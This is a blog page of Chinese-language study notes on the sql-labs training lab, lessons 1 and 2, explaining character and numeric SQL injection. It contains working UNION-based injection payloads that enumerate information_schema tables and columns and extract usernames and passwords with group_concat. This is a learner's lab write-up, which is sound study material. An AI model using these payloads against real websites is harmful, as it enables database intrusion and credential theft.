

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/logo.jpg">
  <link rel="icon" href="/img/logo.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="aidemofashi">
  <meta name="keywords" content="">
  
    <meta name="description" content="sql-labs 学习笔记sql-labs less-1字符型sql注入后端代码(编的) 1select * from users where id&#x3D;&#x27;$get_id&#x27; 在url中直接使用’#’会被url解析，导致传入服务器的不为’#’所以使用‘- - +’ 12?id&#x3D;1&#x27;&#x2F;&#x2F;看能否判断sql注入类型 拼入sql查询 1select * from users whe">
<meta property="og:type" content="article">
<meta property="og:title" content="note-01">
<meta property="og:url" content="https://aidemofashi.github.io/2025/02/26/note-01/index.html">
<meta property="og:site_name" content="aidemofashi&#39;s blog">
<meta property="og:description" content="sql-labs 学习笔记sql-labs less-1字符型sql注入后端代码(编的) 1select * from users where id&#x3D;&#x27;$get_id&#x27; 在url中直接使用’#’会被url解析，导致传入服务器的不为’#’所以使用‘- - +’ 12?id&#x3D;1&#x27;&#x2F;&#x2F;看能否判断sql注入类型 拼入sql查询 1select * from users whe">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-02-26T13:47:26.000Z">
<meta property="article:modified_time" content="2025-05-24T10:09:44.487Z">
<meta property="article:author" content="aidemofashi">
<meta property="article:tag" content="sql-labs">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>note-01 - aidemofashi&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"aidemofashi.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>aidemofashi&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/main.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="note-01"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-26 21:47" pubdate>
          2025年2月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">note-01</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="sql-labs-学习笔记"><a href="#sql-labs-学习笔记" class="headerlink" title="sql-labs 学习笔记"></a>sql-labs 学习笔记</h1><h2 id="sql-labs-less-1"><a href="#sql-labs-less-1" class="headerlink" title="sql-labs less-1"></a>sql-labs less-1</h2><p>字符型<br>sql注入后端代码(编的)</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-keyword">select</span> * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=<span class="hljs-string">&#x27;$get_id&#x27;</span><br></code></pre></td></tr></table></figure>
<p><em><strong>在url中直接使用’#’会被url解析，导致传入服务器的不为’#’所以使用‘- - +’</strong></em></p>
<figure class="highlight fsharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs fsharp"><span class="hljs-operator">?</span><span class="hljs-built_in">id</span><span class="hljs-operator">=</span><span class="hljs-number">1</span>&#x27;<br><span class="hljs-comment">//看能否判断sql注入类型</span><br></code></pre></td></tr></table></figure>
<p>拼入sql查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-keyword">select</span> * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=<span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>

<p>回显：<br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1</p>
<p>KIMI：  </p>
<blockquote>
<p>这个错误信息表明你的SQL语句中存在语法问题，具体问题出现在’1’附近，可能是因为SQL语句的拼接方式不正确，或者某些部分的格式不符合MySQL的语法规则。<br>从错误信息来看，问题可能出在以下几个方面：</p>
</blockquote>
<blockquote>
<p>单引号的使用：错误信息中提到’1’，这表明SQL语句中可能有多余的单引号，或者单引号的使用方式不正确。</p>
</blockquote>
<blockquote>
<p>LIMIT子句的格式：LIMIT 0,1是正确的语法，但错误信息表明它可能与前面的语句拼接不当。</p>
</blockquote>
<blockquote>
<p>注入攻击：如果’1’是用户输入的一部分，那么这可能是SQL注入攻击的迹象。</p>
</blockquote>
<p><strong>LIMIT 0,1 是 SQL 语句中用于限制查询结果数量的子句，特别是在 MySQL 数据库中。<br>它的作用是从查询结果中提取指定范围的记录。具体来说，LIMIT 0,1 的含义如下：</strong>  </p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs applescript">语法格式：<br>LIMIT <span class="hljs-built_in">offset</span>, <span class="hljs-built_in">count</span><br><span class="hljs-built_in">offset</span>：表示从结果集的第几条记录开始提取（从 <span class="hljs-number">0</span> 开始计数）。<br><span class="hljs-built_in">count</span>：表示提取的记录数量。<br></code></pre></td></tr></table></figure>
<p>回显有数字判断为字符型</p>
<p><em><strong>记得用‘-1’来使得前面对‘-1’的查询出现null的结果免得使用‘1’查询出的结果会将后面的查询覆盖，由刚才的：</strong></em>  </p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs hsp"><span class="hljs-keyword">LIMIT</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span><br><span class="hljs-number">0</span>：表示从结果集的第一条记录开始（即跳过 <span class="hljs-number">0</span> 条记录）。<br><span class="hljs-number">1</span>：表示只提取一条记录。<br>因此，<span class="hljs-keyword">LIMIT</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span> 的作用是从查询结果中提取第一条记录。<br></code></pre></td></tr></table></figure>
<p>测试回显行列</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ada">?id=-<span class="hljs-number">1</span><span class="hljs-symbol">&#x27;order</span> by <span class="hljs-number">4</span> <span class="hljs-comment">--+</span><br><br>?id=-<span class="hljs-number">1</span><span class="hljs-symbol">&#x27;union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span> <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>
<p>查询当前库</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">?id=-<span class="hljs-number">1</span><span class="hljs-symbol">&#x27;union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,database() <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>
<p>后面的paylaod</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros">?<span class="hljs-attribute">id</span>=-1&#x27;union select 1,2,group_concat(table_name) <span class="hljs-keyword">from</span> information_schema.tables where <span class="hljs-attribute">table_schema</span>=<span class="hljs-string">&#x27;security&#x27;</span>--+<br>?<span class="hljs-attribute">id</span>=-1&#x27;union select 1,2,group_concat(column_name) <span class="hljs-keyword">from</span> information_schema.columns where <span class="hljs-attribute">table_name</span>=<span class="hljs-string">&#x27;users&#x27;</span>--+<br>?<span class="hljs-attribute">id</span>=-1&#x27;union select 1,2,group_concat(id,username,password) <span class="hljs-keyword">from</span><span class="hljs-built_in"> users </span>--+<br></code></pre></td></tr></table></figure>

<p>在博客园和csdn有很多详细解释，只记下自己不明白去查询的点以防以后忘记</p>
<h3 id="我的新知识点"><a href="#我的新知识点" class="headerlink" title="我的新知识点"></a>我的新知识点</h3><p><strong>group_concat &#x2F;&#x2F;将查询到的表的数据结果拼接起来</strong></p>
<p><strong>union select &#x2F;&#x2F;联合查询，能将同时查询 1,2,3 个</strong></p>
<p><strong>information_schema &#x2F;&#x2F;在SQL中，INFORMATION_SCHEMA 是一个特殊的数据库，它存储了数据库管理系统（DBMS）的元数据信息。这些元数据包括数据库的结构、表的信息、列的定义、用户权限、存储过程等。</strong></p>
<p>INFORMATION_SCHEMA 提供了一种标准化的方式来访问数据库的元数据信息。它类似于一个“数据库的数据库”，帮助用户了解数据库的内部结构和配置。通过查询 INFORMATION_SCHEMA 中的表，用户可以获取以下信息：  </p>
<p>数据库中有哪些表（INFORMATION_SCHEMA.TABLES）。  </p>
<p>每个表有哪些列（INFORMATION_SCHEMA.COLUMNS）。</p>
<p>数据库的用户权限（INFORMATION_SCHEMA.USER_PRIVILEGES）。</p>
<p>数据库的字符集和校对规则（INFORMATION_SCHEMA.CHARACTER_SETS）。</p>
<p>存储过程和函数的定义（INFORMATION_SCHEMA.ROUTINES）。</p>
<p>数据库的表分区信息（INFORMATION_SCHEMA.PARTITIONS）。</p>
<p>数据库的外键约束信息（INFORMATION_SCHEMA.KEY_COLUMN_USAGE）。</p>
<p><em><strong>我看我目前用到的是下面：</strong></em></p>
<p>  (1) INFORMATION_SCHEMA.TABLES<br>用途：列出数据库中所有表的信息。<br>字段：<br>table_schema：表所属的数据库名称。<br>table_name：表的名称。<br>table_type：表的类型（如 BASE TABLE 或 VIEW）。<br>engine：表的存储引擎（如 InnoDB 或 MyISAM）。</p>
<p>(2) INFORMATION_SCHEMA.COLUMNS<br>用途：列出表中所有列的详细信息。<br>字段：<br>table_schema：表所属的数据库名称。<br>table_name：表的名称。<br>column_name：列的名称。<br>data_type：列的数据类型<br>character_maximum_length：列的最大长度。</p>
<p><em><strong>搭配 where 来使用</strong></em></p>
<p>回顾刚才的payload</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?id=<span class="hljs-number">-1</span><span class="hljs-string">&#x27;union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;</span><span class="hljs-keyword">security</span><span class="hljs-string">&#x27;--+</span><br><span class="hljs-string">?id=-1&#x27;</span><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(<span class="hljs-built_in">column_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">&#x27;users&#x27;</span><span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<h2 id="less-2"><a href="#less-2" class="headerlink" title="less-2"></a>less-2</h2><h3 id="新知识点"><a href="#新知识点" class="headerlink" title="新知识点"></a>新知识点</h3><p><em><strong>数字型注入的sql语句</strong></em></p>
<p>后端代码 例</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-string">&quot;selcet * from users where id=<span class="hljs-variable">$get_id</span>&quot;</span><br><br></code></pre></td></tr></table></figure>
<p>与字符型的区别是将用户输入内容：</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-meta"><span class="hljs-keyword">$get</span>_id</span><br></code></pre></td></tr></table></figure>
<p>直接拼接到sql语句中。  </p>
<p>对比字符型sql语句</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-keyword">select</span> * from <span class="hljs-built_in">users</span> <span class="hljs-built_in">where</span> <span class="hljs-built_in">id</span>=<span class="hljs-string">&#x27;$get_id&#x27;</span><br></code></pre></td></tr></table></figure>
<p>所以不需要使用 “ ‘ “ 来构建新的查询，也不需要 ‘#’ 或者 ‘–+’来将后面的语句注释掉，如果带密码则需要注释吧  </p>
<pre><code class="hljs">?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;
?id=-1 union select 1,2,group_concat(username ,id , password) from users
</code></pre>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/sql-labs/" class="print-no-link">#sql-labs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>note-01</div>
      <div>https://aidemofashi.github.io/2025/02/26/note-01/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>aidemofashi</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年2月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/02/27/note-02/" title="note-02">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">note-02</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/02/26/notepad/" title="note-01">
                        <span class="hidden-mobile">note-01</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
